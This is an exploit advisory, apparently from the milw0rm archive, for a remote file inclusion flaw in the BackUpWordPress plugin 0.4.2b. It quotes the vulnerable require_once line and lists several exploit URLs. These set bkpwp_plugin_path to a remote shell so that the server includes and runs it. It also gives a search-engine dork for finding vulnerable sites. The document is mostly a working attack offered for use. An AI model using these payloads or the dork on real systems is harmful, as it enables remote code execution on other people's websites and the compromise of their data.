--------------------------------- [ Xmors Underground Team ! ] -------------------------------------- Title : BackUpWordPress <= 0.4.2b Remote File Inclusion Vulnerability -------------------------------------------------------------------------------- #Author: S.W.A.T. #cont@ct: svvateam@yahoo.com -------------------------------------------------------------------------------- ------------------------- ------------------------------------------------------- Application : BackUpWordPress 0.4.2b Download : http://wordpress.designpraxis.at/download/backupwordpress.zip -------------------------------------------------------------------------------- Vuln : require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php"; -------------------------------------------------------------------------------- Exploit: http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3? & other Files & Folders In The [Archive] Folder -------------------------------------------------------------------------------- Dork: "inurl:/plugins/BackUp" -------------------------------------------------------------------------------- --------------------------------- [http://www.xmors.com ] -------------------------------------- # milw0rm.com [2007-11-01]